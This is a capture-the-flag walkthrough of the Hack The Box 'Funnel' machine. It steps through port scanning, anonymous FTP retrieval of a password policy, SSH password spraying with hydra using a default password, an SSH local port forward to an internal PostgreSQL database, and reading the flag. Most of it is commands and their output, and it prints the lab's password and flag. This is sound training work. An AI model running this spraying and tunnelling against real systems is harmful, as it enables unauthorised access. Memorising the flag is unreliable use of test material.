08.FUNNEL (PASSWORD SPRAYING & LOCAL PORT FORWARDING)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough.
    - adding -sC is another good way to gather service details
       - the -sC option runs the default "safe" scripts, which are designed to provide useful
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 21,22
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.10.14.215
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 4
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxr-xr-x    2 ftp      ftp          4096 Nov 28  2022 mail_backup
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
 |   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
 |_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

 * -sC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 21,22
 PORT   STATE SERVICE
 21/tcp open  ftp
 22/tcp open  ssh

 * --script=vuln runs scripts that focus specifically on detecting known
   vulnerabilities in the services found on the scanned ports (here 21 and 22)
    - e.g., weak configurations, or known vulnerabilities in the detected service
       - if no results are found, the service may be fully patched, or simply not covered by any script

FOOTHOLD/COMPROMISE

Submit root flag
#
root@oco:~$ ftp {targetIP}
 220 (vsFTPd 3.0.3)
 Name ({targetIP}:{username}): {anonymous}
 230 Login successful.
 Remote system type is UNIX.
 Using binary mode to transfer files.

ftp> help
 cd     dir  ls   type
 chmod  exit pwd
 delete get  quit
 
ftp> dir
 drwxr-xr-x    2 ftp      ftp          4096 Nov 28  2022 mail_backup
 
ftp> cd mail_backup
 250 Directory successfully changed.

ftp> dir
 229 Entering Extended Passive Mode (|||52450|)
 150 Here comes the directory listing.
 -rw-r--r--    1 ftp      ftp         58899 Nov 28  2022 password_policy.pdf
 -rw-r--r--    1 ftp      ftp           713 Nov 28  2022 welcome_28112022
 226 Directory send OK.

ftp> get password_policy.pdf
 226 Transfer complete.
 
ftp> get welcome_28112022
 226 Transfer complete.
 
ftp> exit
 221 Goodbye.
root@oco:~$ cat welcome_28112022 
 From: [email protected]
 To: [email protected] [email protected] [email protected] [email protected] [email protected]
 Subject:Welcome to the team!
 ...
 
 * the usernames in the "From" and "To" lines (the addresses are masked in this copy; their local parts are collected in usernames.txt below) can be used for password spraying
 
root@oco:~$ open password_policy.pdf
 ...default password
 funnel123#!#
 ...
#PASSWORD SPRAYING
root@oco:~$ cat > usernames.txt
 optimus
 albert
 andreas
 christine
 maria
 root
 
 CTRL+C

root@oco:~$ hydra -L usernames.txt -p 'funnel123#!#' {target_IP} ssh 
 [DATA] attacking ssh://10.129.185.117:22/
 [22][ssh] host: 10.129.185.117   login: christine   password: funnel123#!#
 1 of 1 target successfully completed, 1 valid password found
#internal enumeration
root@oco:~$ ssh christine@{targetIP}
 funnel123#!#
 
root@oco:~$ id
 uid=1000(christine) gid=1000(christine) groups=1000(christine)
 
root@oco:~$ ss -tlpna
 State       Recv-Q   Send-Q   Local Address:Port     Peer Address:Port       Process                
 LISTEN      0        4096     127.0.0.53%lo:53       0.0.0.0:*
 LISTEN      0        128      0.0.0.0:22             0.0.0.0:*
 LISTEN      0        4096     127.0.0.1:5432         0.0.0.0:*
 LISTEN      0        4096     127.0.0.1:35437        0.0.0.0:*
 SYN-SENT    0        1        10.129.185.117:49946   8.8.8.8:53
 ESTAB       0        0        10.129.185.117:22      10.10.14.215:50268
 LISTEN      0        32       *:21                   *:*
 LISTEN      0        128      [::]:22                [::]:*
 
 * the "local address:port" column displays the local address on which a service listens
    - an address of 127.0.0.1 means the port is only listening locally on the machine and cannot be reached directly from the network (a local user, or an SSH tunnel as shown below, can still reach it)
    - addresses 0.0.0.0, *, and [::] indicate that a port is listening on all interfaces
       - these are accessible externally, as well as locally
       
root@oco:~$ ss -tlpa
 State       Recv-Q   Send-Q   Local Address:Port         Peer Address:Port       Process
 LISTEN      0        4096     127.0.0.53%lo:domain       0.0.0.0:*
 LISTEN      0        128      0.0.0.0:ssh                0.0.0.0:*
 LISTEN      0        4096     127.0.0.1:postgresql       0.0.0.0:*
 LISTEN      0        4096     127.0.0.1:35437            0.0.0.0:*
 SYN-SENT    0        1        10.129.185.117:49946       8.8.8.8:53
 ESTAB       0        0        10.129.185.117:ssh         10.10.14.215:50268      //this indicates that the attacker is connected from 10.10.14.215 via port 50268
 LISTEN      0        32       *:ftp                      *:*
 LISTEN      0        128      [::]:ssh                   [::]:*
 
christine@funnel:~$ which psql
christine@funnel:~$ psql
 Command 'psql' not found, but can be installed with:
 apt install postgresql-client-common
 Please ask your administrator.
 
 * the postgresql DB can be accessed using the 'psql' utility (if installed on the host)
    - instead of uploading static binaries onto the target machine, an easier 
      way to bypass this roadblock is by a practice called port-forwarding, 
      or tunneling, using SSH
#
root@oco:~$ ssh [email protected] -L 31173:127.0.0.1:5432
 [email protected]'s password: funnel123#!#
 
 * the ssh client (attackerMachine) will establish a secure connection
   to the remote SSH server (targetMachine). the ssh client (attackerMachine)
   will listen for incoming connections on local port 31173 (by default bound
   only to the attacker machine's loopback interface).
    - when a client connects to the local port, the ssh client (attackerMachine)
      will forward the connection over the tunnel to 127.0.0.1:5432 on the
      remote server (targetMachine). this allows the local client (attackerMachine)
      to access services on the remote server (targetMachine) as if they were
      running on the local machine.
      
christine@funnel:~$ ss -tlpna
 State     Recv-Q  Send-Q  Local Address:Port   Peer Address:Port    Process
 LISTEN    0       4096    127.0.0.53%lo:53     0.0.0.0:*             
 LISTEN    0       128     0.0.0.0:22           0.0.0.0:*           
 LISTEN    0       4096    127.0.0.1:5432       0.0.0.0:*            
 LISTEN    0       4096    127.0.0.1:38617      0.0.0.0:*            
 ESTAB     0       0       10.129.22.40:22      10.10.14.215:46754  
 SYN-SENT  0       1       10.129.22.40:42680   8.8.8.8:53           
 LISTEN    0       32      *:21                 *:*                  
 LISTEN    0       128     [::]:22              [::]:*
#
root@oco:~$ psql -U christine -h localhost -p 31173
 Password for user christine: 
 psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
 Type "help" for help.

christine=# 

 * ensure to specify localhost using the -h option to target the tunnel
   created earlier with SSH, as well as port 31173 with the -p option, 
   which is the port the tunnel is listening on.
   
christine=# \list
                                                   List of databases
   Name    |   Owner   | Encoding |  Collate   |   Ctype    | ICU Locale | Locale Provider |    Access privileges    
 -----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
 christine | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 postgres  | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 secrets   | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 template0 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 template1 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 (5 rows)

 * this lists the existing databases
 
christine=# \connect secrets
 psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
 You are now connected to database "secrets" as user "christine".

 * this connects to the specified database
 
secrets=# \dt 
          List of relations
 Schema | Name | Type  |   Owner   
 --------+------+-------+-----------
 public | flag | table | christine
 (1 row)

 * this lists the tables in the current database
 
secrets=# select * from flag;
              value               
 ----------------------------------
 cf277664b1771217d7006acdea006db1
 (1 row)
